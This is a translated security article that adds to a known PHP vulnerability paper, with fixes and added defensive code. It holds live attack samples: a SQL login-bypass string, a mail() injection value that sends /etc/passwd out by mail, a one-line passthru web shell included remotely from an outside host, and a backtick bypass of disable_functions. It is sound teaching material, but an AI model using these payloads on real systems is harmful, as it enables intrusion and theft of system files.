Author: san
A Study In Scarlet - Exploiting Common Vulnerabilities in PHP Applications
Shaun Clowes's article "Exploiting Common Vulnerabilities in PHP Applications" is really well written, and I have a lot of respect for it. Here I only add a few points that the article did not mention. This article focuses on solving the problems rather than
1, Spoofing SQL statements, the oldest trick
In the default mode, even if you forget to copy php.ini to /usr/local/lib/php.ini, PHP still turns on
magic_quotes_gpc = on.
This prefixes every single quote ('), double quote ("), backslash (\) and NUL character (the null byte) in GET/POST/Cookie variables with a backslash, so that the values can be used in database queries.
However, php-4-RC2 introduced a configuration file php.ini-optimized, and in that "optimized" php.ini magic_quotes_gpc = off. People who read about this optimization online and copy php.ini-optimized to /usr/local/lib/php.ini are then in more danger. As a simple test, assume the characters are not filtered:
select * from login where user='$HTTP_POST_VARS[user]' and pass='$HTTP_POST_VARS[pass]'
We can enter 1' or 1='1 in both the username box and the password box and pass verification. This is a very old trick; the statement becomes
select * from login where user='1' or 1='1' and pass='1' or 1='1'
Since or 1='1' is true, it passes.
The best solution is to filter out all unnecessary characters. A further recommendation is to pass every GET/POST/Cookie variable that is used in SQL through a custom function:
function gpc2sql($str) {
    if (get_magic_quotes_gpc() == 1)
        return $str;         // PHP already added the backslashes
    return addslashes($str); // otherwise escape ' " \ and NUL ourselves
}
This is mainly so that your security handling survives when the program is moved between differently configured systems.
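As an added example (not code from san's article), this is how the gpc2sql idea looks on current PHP, where get_magic_quotes_gpc() no longer exists, combined with the character whitelisting the article recommends; the login query is the article's, while the helper names (gpc2sql_safe, clean_username, build_login_query) and the sample inputs are this example's own.

```php
<?php
// Added example: escape every GET/POST/Cookie value used in SQL exactly once,
// whatever magic_quotes_gpc is set to, and whitelist the username before it
// ever reaches the query. Helper names are the example's own.

// Same idea as the article's gpc2sql(): honour magic_quotes_gpc while the
// interpreter still has it (removed in PHP 8) so values are never escaped twice.
function gpc2sql_safe($str) {
    if (function_exists('get_magic_quotes_gpc') && @get_magic_quotes_gpc()) {
        return $str;            // PHP already added the backslashes
    }
    return addslashes($str);    // escapes ' " \ and NUL
}

// "Filter all unnecessary characters": a login name is a short token, nothing else.
function clean_username($user) {
    return (is_string($user) && preg_match('/^[A-Za-z0-9_.-]{1,32}$/', $user)) ? $user : null;
}

// Builds the article's login statement; returns null when the username is rejected.
function build_login_query($user, $pass) {
    $u = clean_username($user);
    if ($u === null) {
        return null;
    }
    $p = gpc2sql_safe($pass);   // a password may contain any character, so escape it
    return "select * from login where user='$u' and pass='$p'";
}

// Constructed inputs: a normal login and the article's 1' or 1='1 payload.
var_dump(build_login_query('alice', "s3cret'pw"));
// The payload is refused outright as a username ...
var_dump(build_login_query("1' or 1='1", "1' or 1='1"));
// ... and when it arrives as a password its quotes are escaped, so the
// or 1='1 clause stays inside the string literal.
var_dump(build_login_query('alice', "1' or 1='1"));
```

addslashes() knows nothing about the connection's character set, so on PHP 5 and later prefer mysqli or PDO prepared statements; the example mirrors the PHP 4 technique the article describes.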
2, The fifth parameter of the mail function
In php-4.0.5 the mail function gained a fifth parameter, used to pass additional command-line arguments to the mail program when the mail is sent.
But there is no proper check for shell special characters, so it is a serious command-execution problem. Take the example from the manual:
mail("firstname.lastname@example.org", "the subject", $message, "From: webmaster@$SERVER_NAME", "-fwebmaster@$SERVER_NAME");
This is a problem: if $SERVER_NAME = "; mail email@example.com </etc/passwd", the machine's password file is sent to my mailbox.
Here is a reminder: several examples in the PHP manual have security issues. When we actually use them we should not simply copy them; they only demonstrate the basic behaviour of the function, so understand them first.
The simplest fix for this mail problem is to not use the fifth parameter at all. If you must use it, filter illegal characters such as (;). You can also modify the PHP source package: in ext/standard/mail.c, before the line if (extra_cmd != NULL) {, add the following line:
extra_cmd = NULL;
and then recompile.
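As an added example (not the article's code), the application-level version of "filter illegal characters": the envelope sender is validated as an e-mail address before it is handed to mail()'s fifth parameter, so the article's injection string can never become part of the sendmail command line. The function names safe_envelope_sender and send_notice and the sample inputs are assumptions of this example.

```php
<?php
// Added example: validate the envelope sender before it reaches mail()'s fifth
// parameter, so a value such as the article's "; mail x@example.com </etc/passwd"
// is refused instead of being appended to a shell command.

// Returns "-f<address>" for a syntactically valid address, otherwise null.
function safe_envelope_sender($address) {
    if (!is_string($address) || filter_var($address, FILTER_VALIDATE_EMAIL) === false) {
        return null;        // spaces, ';', '<', '`' and so on all fail this test
    }
    return '-f' . $address;
}

// Wrapper around mail(): the fifth argument is passed only when it validated, and
// the same validated address is used for the From: header (so no CR/LF either).
function send_notice($to, $subject, $message, $sender) {
    $extra = safe_envelope_sender($sender);
    if ($extra === null) {
        error_log('send_notice: rejected envelope sender: ' . var_export($sender, true));
        return false;       // refuse to send rather than fall back to a tainted value
    }
    return mail($to, $subject, $message, "From: $sender", $extra);
}

// Constructed inputs: a legitimate sender and the article's injection string.
var_dump(safe_envelope_sender('webmaster@example.org'));                 // accepted
var_dump(safe_envelope_sender('; mail email@example.com </etc/passwd')); // rejected
```

Later PHP releases also pass this argument through escapeshellcmd() internally, but validating the address in the application is still where the control belongs.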
3, The Unix version of the require and include functions
The Windows version of require and include does not support including remote files over HTTP and FTP, but the Unix version supports remote file includes by default.
Whatever the extension of the file you require or include, it is executed as part of the program.
To make our programs modular and portable we inevitably use require or include a lot, and sometimes with a variable as the parameter, for example: include("$something"); if the user can control the parameter $something and it is not filtered, it is all over.
First, the user can view any file the web user has read permission on. Assuming the program is called http://victim/test.php, we can use the URL http://victim/test.php?something=/etc/passwd to view the /etc/passwd file.
In addition, the remote file include feature can be used to execute commands. For example, I create a file test.php on www.xfocus.org containing:
<? passthru($cmd) ?>
Then I can use the URL http://victim/test.php?something=http://www.xfocus.org/test.php?cmd=uname to run arbitrary commands.
phpMyAdmin also had this problem, and we could use it to view any file we wanted. Before including a file it uses the file_exists function to check that the file exists, and file_exists does not support remote files, so the second method above cannot be used directly. However, we can use the Apache log: request a URL that contains PHP code, then set something to the Apache log file, and commands can still be executed. But the Apache log is usually rather large and contains too much clutter.
The method described in http://www.securereality.com.au/sradv00008.txt is cleverer: it uses file upload to execute local commands. The uploaded script lands in the server's temporary directory under a file name such as php8Ta02I; because this file really exists it passes the file_exists check, and including it executes the uploaded script.
So include and require must be used carefully, especially when the included file is specified by a parameter; the parameter must never be under the user's control. Remote file include can also be switched off in php.ini: in php-4.0.3 this was the --disable-url-fopen-wrapper option, and in later versions set allow_url_fopen = off.
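As an added example (not from the article or phpMyAdmin), here is the replacement for include("$something") that the section argues for: the user-supplied value is reduced to a token, checked against a whitelist, and canonicalised inside a fixed directory, so "/etc/passwd", "../../x", a log file path or "http://www.xfocus.org/test.php" can never reach include(). MODULE_DIR, resolve_module and the module names are assumptions of this example.

```php
<?php
// Added example: resolve an include target from user input against a fixed
// directory and a whitelist instead of passing it to include() directly.

define('MODULE_DIR', __DIR__ . '/modules');   // assumption: local modules live here

// Returns the absolute path of an allowed module, or null if the name is rejected.
function resolve_module($name) {
    // 1. Only a short token: no slashes, dots, NUL bytes or URL schemes survive this.
    if (!is_string($name) || !preg_match('/^[a-z0-9_]{1,32}$/', $name)) {
        return null;
    }
    // 2. Explicit whitelist: the modules this page actually offers.
    static $allowed = array('news', 'login', 'search');
    if (!in_array($name, $allowed, true)) {
        return null;
    }
    // 3. Canonicalise and make sure the result is still inside MODULE_DIR
    //    (guards against symlinks and any future relaxation of step 1).
    $path = realpath(MODULE_DIR . '/' . $name . '.php');
    $base = realpath(MODULE_DIR);
    if ($path === false || $base === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Usage in place of include("$something"):
$something = isset($_GET['something']) ? $_GET['something'] : 'news';
$module = resolve_module($something);
if ($module === null) {
    header('HTTP/1.1 400 Bad Request');
    exit('unknown module');
}
include $module;
```

Together with allow_url_fopen = off from the article (and allow_url_include = Off on PHP 5.2 and later), this removes both the local file read and the remote include.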
4, disable_functions
php-4.0.1 introduced the php.ini feature disable_functions, which is quite useful: you can use it to prohibit certain functions.
For example, put disable_functions = passthru,exec,system,popen in php.ini, and executing any of these functions only produces
Warning: system() has been disabled for security reasons.
Alas, there is still no way to stop command execution entirely. Because PHP took many of its characteristics from Perl, backticks (`) can also be used to execute commands:
$output = `ls -al`;
echo "<pre>$output</pre>";
The only way to avoid this is safe_mode, but safe_mode's restrictions on too many other things are annoying and make some tasks cumbersome.
5, File upload
The PHP file upload problem is described very clearly in the article http://www.securereality.com.au/sradv00001.html.
This is a fairly serious problem: in general we put the upload directory under the web root, so it is easy to attack the system and read any file the web user can read.
Fortunately, php-4.0.3 and later provide the move_uploaded_file and is_uploaded_file functions. So upload code on php-4.0.3 and above must not use the copy function; use move_uploaded_file instead, which checks that the file was really uploaded. On php-4.0.2 and below, it is recommended to check with the following function before calling copy:
function is_uploaded_file($filename) {
    if (!$tmp_file = get_cfg_var('upload_tmp_dir')) {
        $tmp_file = dirname(tempnam('', ''));   // fall back to the system temp directory
    }
    $tmp_file .= '/' . basename($filename);
    /* User might have trailing slash in php.ini... */
    return (ereg_replace('/+', '/', $tmp_file) == $filename);
}
This vulnerability was in the spotlight for a long time, but many scripts already check with an if statement before copying, which makes the attack quite difficult to carry out.
Also, do not use environment variables, Cookie variables or session variables for decisions that matter, because these variables are too easily forged.
Well, that is what I have on hand; I will add more as I think of it, and other comrades are welcome to add or change anything.
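As an added example (not the article's code), a complete upload handler built on the is_uploaded_file()/move_uploaded_file() pair the section recommends: the file is accepted only if PHP itself received it, its type is taken from its content rather than the client's name, and it is stored under a server-generated name outside the web root. UPLOAD_STORE, store_upload and the field name userfile are assumptions of this example.

```php
<?php
// Added example: upload handler using is_uploaded_file()/move_uploaded_file(),
// storing outside the web root and never trusting the client-supplied filename.

define('UPLOAD_STORE', dirname(__DIR__) . '/uploads_private'); // assumption: not under DocumentRoot

// Returns the stored path on success, or a short error code string.
function store_upload(array $file) {
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        return 'upload_failed';
    }
    // Refuse anything PHP did not itself receive via HTTP POST, e.g. a forged
    // tmp_name pointing at /etc/passwd, which is the attack the article describes.
    if (!is_uploaded_file($file['tmp_name'])) {
        return 'not_an_upload';
    }
    if ($file['size'] > 2 * 1024 * 1024) {
        return 'too_large';
    }
    // Whitelist by content-derived type, not by the user-supplied name or MIME type.
    $allowed = array('image/png' => 'png', 'image/jpeg' => 'jpg', 'text/plain' => 'txt');
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset($allowed[$mime])) {
        return 'bad_type';
    }
    // Server-generated name: no traversal, no double extensions, never .php.
    $dest = UPLOAD_STORE . '/' . bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return 'move_failed';
    }
    chmod($dest, 0640);   // readable by the web user only, never executable
    return $dest;
}

if (isset($_FILES['userfile'])) {
    $result = store_upload($_FILES['userfile']);
    echo is_file($result) ? "stored\n" : "rejected: $result\n";
}
```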
References:
1, PHP 4 ChangeLog (http://www.php.net/ChangeLog-4.php)
2, A Study In Scarlet - Exploiting Common Vulnerabilities in PHP Applications (http://www.securereality.com.au/studyinscarlet.txt) and analysist's translation
3, Remote command execution vulnerabilities in phpMyAdmin and phpPgAdmin